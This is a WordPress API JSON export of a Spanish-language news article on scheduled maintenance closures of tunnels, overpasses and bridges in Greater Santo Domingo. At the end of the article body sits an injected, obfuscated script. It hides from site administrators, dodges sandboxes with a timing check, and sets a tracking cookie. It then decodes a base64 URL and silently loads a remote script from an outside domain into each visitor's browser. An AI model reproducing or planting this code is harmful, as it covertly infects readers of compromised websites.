{"id":13212,"date":"2023-01-10T15:28:26","date_gmt":"2023-01-10T19:28:26","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13212"},"modified":"2023-01-10T15:28:26","modified_gmt":"2023-01-10T19:28:26","slug":"obras-publicas-cerrara-a-partir-de-este-martes-tuneles-y-elevados-por-mantenimiento","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13212","title":{"rendered":"Obras P\u00fablicas cerrar\u00e1 a partir de este martes t\u00faneles y elevados por mantenimiento"},"content":{"rendered":"<p>El Ministerio de Obras P\u00fablicas y Comunicaciones\u00a0cerrar\u00e1 al tr\u00e1nsito vehicular, a partir de este martes 10 y extensivo hasta el s\u00e1bado 14 de enero, distintos pasos a desnivel en el Gran Santo Domingo (que incluyen t\u00faneles, elevados y puentes), a fin de realizar trabajos de mantenimiento.<\/p>\n<p>En cada caso, habr\u00e1 cierre total, y el horario a regir ser\u00e1 de 10:00 de la noche a 5:00 de la ma\u00f1ana del d\u00eda siguiente.<\/p>\n<p>La noche de este martes ser\u00e1n cerrados los elevados de la avenida Luper\u00f3n con autopista 30 de Mayo, autopista Duarte con entrada a Los Alcarrrizos, Charles de Gaulle con San Isidro, y carretera Mella.<\/p>\n<p>Martes y el s\u00e1bado el mantenimiento ser\u00e1 a los pasos a desnivel del kil\u00f3metro 13 de la autopista Duarte con avenida Rep\u00fablica de Colombia, y Prolongaci\u00f3n 27 de Febrero, y el puente peatonal del kil\u00f3metro 14 de la Duarte.<\/p>\n<p>Asimismo, el martes de noche ser\u00e1n realizados trabajos de mantenimiento el\u00e9ctrico al puente Ozama, los cuales no ameritan cierre.<\/p>\n<p>Para el mi\u00e9rcoles toca el\u00a0cierre\u00a0al t\u00fanel de la Ortega y Gasset (UASD); los puentes Ozama y Gregorio Luper\u00f3n; los pasos a desnivel de la Ortega y Gasset con avenida 27 de Febrero, y M\u00e1ximo G\u00f3mez con avenida Duarte, as\u00ed como el elevado de la G\u00f3mez con Nicol\u00e1s de Ovando.<\/p>\n<p>El jueves, el\u00a0cierre\u00a0ser\u00e1 para el paso a desnivel de la avenida Charles de Gaulle con avenida Hermanas Mirabal; el puente en la avenida Jacobo Majluta (pr\u00f3ximo a la entrada a Los Guaricanos), y los elevados de la carretera S\u00e1nchez con avenida Independencia (Kil\u00f3metro 12); el Expreso Quinto Centenario con avenida Duarte, Hermanos Pinz\u00f3n y avenida San Mart\u00edn.<\/p>\n<p>Para el viernes 13 habr\u00e1\u00a0cierre\u00a0en los pasos a desnivel de la Prolongaci\u00f3n 27 de Febrero con autopista 6 de Noviembre, y la Padre Castellanos con avenida Francisco del Rosario S\u00e1nchez; los elevados de la John F. Kennedy con Winston Churchill en ambos sentidos; y los puentes de la autopista 6 de Noviembre, Carretera S\u00e1nchez, Ram\u00f3n Mat\u00edas Mella y Francisco del Rosario S\u00e1nchez.<\/p>\n<p>El s\u00e1bado tocar\u00e1 a los pasos a desnivel de la John F. Kennedy con Luper\u00f3n (kil\u00f3metro 9), y la avenida San Vicente de Paul con Venezuela.<\/p>\n<p>Tambi\u00e9n se le dar\u00e1 mantenimiento al Centro de Control del T\u00fanel de la Ortega y Gasset (UASD). Esos trabajos no ameritan cierre.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Obras P\u00fablicas y Comunicaciones\u00a0cerrar\u00e1 al tr\u00e1nsito vehicular, a partir de este martes 10 y extensivo hasta el s\u00e1bado 14 de enero, distintos pasos a desnivel en el Gran Santo Domingo (que incluyen t\u00faneles, elevados y puentes), a fin de realizar trabajos de mantenimiento. En cada caso, habr\u00e1 cierre total, y el horario [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13216,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13212","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13212","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13212"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13212\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13216"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}